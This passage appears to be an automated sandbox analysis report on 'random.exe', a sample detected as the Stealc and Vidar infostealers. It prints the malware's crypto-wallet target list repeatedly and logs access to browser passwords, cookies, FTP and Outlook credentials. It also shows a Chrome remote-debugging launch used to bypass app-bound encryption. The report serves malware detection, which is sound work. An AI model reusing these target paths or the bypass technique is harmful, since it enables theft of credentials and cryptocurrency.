              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*L
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
              Source: Yara matchFile source: 00000000.00000002.1871424059.000000000011C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random.exe PID: 1984, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1458194965.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1871424059.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random.exe PID: 1984, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: Process Memory Space: random.exe PID: 1984, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop Protocol4
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager235
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder              		12
              Software Packing              		NTDS1
              Query Registry              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets641
              Security Software Discovery              		SSHKeylogging114
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection              		Cached Domain Credentials24
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job24
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1622965 Sample: random.exe Startdate: 24/02/2025 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus detection for URL or domain 2->53 55 8 other signatures 2->55 7 random.exe 33 2->7         started        12 msedge.exe 9 2->12         started        process3 dnsIp4 39 185.215.113.115, 49704, 49726, 49737 WHOLESALECONNECTIONSNL Portugal 7->39 41 127.0.0.1 unknown unknown 7->41 27 C:\Users\user\AppData\...\places.sqlite-shm, data 7->27 dropped 29 C:\Users\user\AppData\...\cookies.sqlite-shm, data 7->29 dropped 31 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->31 dropped 33 11 other files (none is malicious) 7->33 dropped 57 Detected unpacking (changes PE section rights) 7->57 59 Attempt to bypass Chrome Application-Bound Encryption 7->59 61 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->61 63 11 other signatures 7->63 14 msedge.exe 2 11 7->14         started        17 chrome.exe 8 7->17         started        20 msedge.exe 12->20         started        file5 signatures6 process7 dnsIp8 65 Monitors registry run keys for changes 14->65 22 msedge.exe 14->22         started        35 192.168.2.8, 138, 443, 49703 unknown unknown 17->35 37 239.255.255.250 unknown Reserved 17->37 24 chrome.exe 17->24         started        signatures9 process10 dnsIp11 43 plus.l.google.com 142.250.185.238, 443, 49721 GOOGLEUS United States 24->43 45 www.google.com 142.250.185.68, 443, 49708, 49709 GOOGLEUS United States 24->45 47 2 other IPs or domains 24->47

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.